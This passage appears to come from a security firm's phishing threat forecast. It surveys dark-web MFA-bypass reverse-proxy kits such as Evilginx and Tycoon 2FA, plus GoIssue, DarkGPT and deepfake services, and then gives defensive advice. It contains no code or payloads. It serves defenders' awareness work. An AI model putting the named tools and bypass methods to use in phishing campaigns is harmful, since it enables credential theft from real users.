The dark web offers a variety of reverse-proxy solutions, many of which come with additional functionality. Tycoon 2FA and Mamba 2FA provide phishing templates and ready-to-use decoy documents. Tycoon 2FA also includes a real-time dashboard displaying metrics such as the number of blocked bots, successful logins, stolen credentials, and their details. Many of these platforms integrate CAPTCHA to evade automatic analysis and use IP proxies to hide the hosting provider's origin. Tools like ONNX Store take it a step further by using encrypted JavaScript code, which is decrypted only when the page loads. This adds an extra layer of obfuscation to bypass detection. Most of these services operate on a subscription basis, with an average price of around $250.

There are also open-source solutions available on platforms like GitHub. One of the most popular among them is Evilginx, which relies on small configuration files called phishlets. Setting up a phishlet can cost approximately $200, though many pre-made phishlets, along with guides for creating them, are readily available on dark web forums.

Evilginx itself is not particularly user-friendly, especially for beginners. Its developers even created a paid training course to help users set it up. However, in October 2024, this course started circulating for free on dark web forums. 

According to JumpCloud, 87% of companies with over 10,000 employees and 78% of companies with 1,001–10,000 employees use MFA. Research by Okta also indicates that MFA adoption continues to grow. As more organizations implement MFA, phishing attacks designed to bypass it will only increase in frequency. The growing demand for MFA bypass tools creates a corresponding supply, and these solutions remain widely available on the dark web. The release of the Evilginx training course for free is likely to lead to a rise in its use, particularly among less experienced attackers. 

Forecast 14. The hunt for IT specialists will continue

One of the most dangerous phishing tools to emerge in 2024 was GoIssue. This tool enables attackers to automatically extract email addresses from GitHub profiles and send out mass phishing campaigns. For example, attackers can use fake GitHub notification emails, impersonating security staff or recruiters. GoIssue streamlines the phishing process, making it more efficient and automated. The emergence of GoIssue aligns closely with the growing trend of targeting developers. Developers can serve as critical initial access points not only for attacks on individual organizations but also on broader supply chains. This trend is likely to continue into 2025.

Earlier, we predicted the increased use of AI and deepfakes in phishing attacks. The release of DarkGPT on cybercriminal forums in December 2024 further reinforces this trend. DarkGPT is a tool designed to generate phishing emails and assist in planning phishing campaigns, significantly simplifying the work for attackers. 

Additionally, advertisements for Deepfake-as-a-Service (DaaS) have begun appearing on dark web platforms. Attackers can also use open-source deepfake tools available on GitHub. The rise of DaaS offerings is another indication that the number of cybersecurity incidents involving deepfakes is likely to grow. 

Phishing attacks will remain one of the most pressing cyberthreats for both organizations and individual users. Each year, these attacks become more sophisticated and harder to detect, demanding constant vigilance and attention to security measures. With the expansion of the dark web and the rise of PhaaS (Phishing-as-a-Service) platforms, the line between professional attackers and novices continues to blur—broadening the pool of potential cybercriminals. Phishing emails are becoming increasingly convincing, and the distinction between targeted and mass phishing is gradually fading. 

At present, email remains the primary communication channel for phishing attacks, though attackers are increasingly combining it with other communication methods to improve their success rates. The goals of phishing campaigns have not changed: attackers still aim to distribute malware and steal credentials. When it comes to phishing themes, work-related topics remain the most commonly used by attackers. These topics are effective at grabbing employees' attention without raising suspicion. At the same time, attackers actively exploit themes tied to current global events. Psychological manipulation remains at the core of phishing, as it's the key to convincing users to take the desired action. 

Attackers devote considerable effort to bypassing security measures. Despite the ongoing development of cybersecurity tools, phishing messages still manage to reach victims. This resembles a game of ping-pong: attackers discover loopholes, cybersecurity solutions close them, and the cycle begins again. As a result, in 2025–2026, attackers are expected to focus on increasing the technical complexity of their attacks. 

Technical measures

To protect against cyberattacks—and cyberattacks in general—we recommend following our general guidelines on personal and corporate cybersecurity. 

Since phishing attacks often start with email, securing your email system is essential. Use secure email gateway (SEG) solutions to block dangerous messages before they cause harm. Implement email authentication protocols like DKIM, DMARC, and SPF. Set up email filtering rules to flag or isolate messages with phishing traits. Regularly test your email security using dedicated services. 

Enable anti-phishing protection built into modern browsers or install additional browser extensions for extra security. Subscribe to Threat Intelligence feeds to stay updated on phishing domains and campaigns. 

To protect devices against malware infection through phishing attacks, use sandboxes to analyze the behavior of downloaded files in a virtualized environment, detect malicious activity, and act in time to prevent damage to your company. To inspect URLs when following links, deploy the following perimeter security solutions: SWG (secure web gateway), NGFW (next-generation firewall), SASE (secure access service edge), and similar tools. Use EDR (endpoint detection and response) solutions to detect and respond to events involving malicious activity on endpoints.

Limit employee access to only the information and systems they need for their work by applying the principle of least privilege. This reduces the chances of attackers accessing critical systems. 

Create an incident response plan and regularly back up your data to ensure quick recovery in case of an attack. 

Organizational measures 

While technical defenses are essential, phishing attacks often rely on the human factor. That's why employee training is a vital part of any cybersecurity strategy. 

Training should combine theory with practical exercises. You can organize courses internally through your IT team, hire external experts, or use online training programs. 

As mentioned earlier, the more employees are exposed to phishing attempts, the better they become at identifying them. According to Hoxhunt, after six months of training, 50% of employees can spot phishing emails, compared to only 13% without training. Run regular simulated phishing campaigns to test your employees and identify areas where knowledge is lacking. These exercises help create a culture of cybersecurity and prepare employees to recognize real threats. Reviewing mistakes made during these tests is crucial for improving defenses. Since phishing tactics change frequently, keep simulations up to date so employees stay familiar with the latest methods attackers use. 

Basic rules for protecting against phishing attacks

Despite their variety, phishing emails often share common warning signs. Follow these rules to recognize phishing emails and protect against an attack:

Stay calm. Do not give in to the emotions attackers try to provoke. Ask yourself:

1. Was this email unexpected?
2. Do I recognize the sender? 
3. Are there spelling or grammar mistakes? Does the design match the quality of the organization it claims to represent?
4. Does the email trigger emotions like fear, curiosity, desire to help, or urgency? Does it make an offer that seems too good to be true? 
5. Are there links, attachments, or QR codes in the email? 
6. Is the email generic, with no personal greeting or details? 
7. Is the request in the email unusual or strange?

If you answer "Yes" to any of these questions, the email might be a phishing attempt. Take a moment to verify the information: call the sender using an official number, check the details through your personal account, and so on. Never share confidential information with third parties. 

Emails

When you receive an email, in addition to using the checklist provided above, it's important to:

• Analyze the sender's details, including the email domain, name, and address. 
• Verify that links lead to legitimate destinations by hovering over them with your cursor to check the actual URL.

Websites

To avoid falling victim to phishing websites, pay attention to:

• The website address and domain name. Check carefully for tricks like typosquatting, which exploits inattentiveness or haste. For example, instead of ptsecurity.com, attackers might use plsecurity.com, pt-security.com, pt.security.com, or ptsecurity.link.
• The presence of an SSL certificate (indicated by a padlock icon in the browser), the certificate owner, and the domain name registration date. You can use tools like WHOIS to verify this information. 

Social networks and messaging apps

To stay safe while using social media and messaging apps:

• Avoid clicking on unverified links or opening suspicious files.
• Limit the amount of personal information visible on your profile. The less data attackers have, the harder it is for them to craft a convincing phishing attack targeting you. 

Don't reuse passwords across multiple accounts. If attackers gain access to one account, they could use the same credentials to compromise others. Make sure to regularly update your passwords and enable two-factor authentication (2FA). This adds an extra layer of protection in case your password is compromised.